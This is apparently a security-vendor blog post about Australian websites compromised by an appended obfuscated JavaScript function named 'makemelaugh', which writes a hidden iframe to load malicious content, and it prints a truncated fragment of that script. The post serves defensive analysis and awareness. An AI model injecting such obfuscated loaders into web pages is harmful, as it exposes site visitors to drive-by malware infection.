No laughing matter – hacked websites in Oz

Readers will no doubt have read numerous postings and articles about the use of compromised sites in malicious attacks (the de rigeur technique for malicious code delivery currently). Unfortunately there are many ‘ways in’ (vulnerabilities in libraries, cross-site scripting (XSS) attacks, web application vulnerabilities, poorly secured web servers to name but a few), and in many cases, limited ability to identify and resolve compromised pages. A significant percentage of sites are outsourced to web development companies as a one-off exercise. Little consideration is given to requirements such as ongoing site maintenance, security etc.

Over the past week or so SophosLabs have become aware of several web sites hosted in Australia that have been compromised. In each case pages on the site have been modified by the appending of an obfuscated JavaScript, characterized by the use of a function of name ‘makemelaugh’. Compromised pages are proactively detected by Sophos as Mal/ObfJS-A.

<script language=Javascript>
function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,
s=0,w=0,t=Array(63,1,20,2,3,27 <snip> }

The script serves the usual purpose – writing an additional HTML iframe tag to the page in order to load malicious content when a victim browses the compromised site. Aside from detecting compromised pages, all the sites referenced in the malicious iframe tags are currently known and classified as high risk by Sophos.

As is often the case, these sites are set up specifically for this purpose, and do not host any legitimate content. Viewing the root of one such domain, you are presented with a very familiar placeholder page:

Placeholder page at root of domain

Users surfing the web tend to place implicit trust in the sites they browse. The reality is that by browsing a site, you are exposing yourself to a certain amount of risk, and placing some trust in the security of that site. Careful selection of operating system, browser, browser configuration and the like is absolutely essential.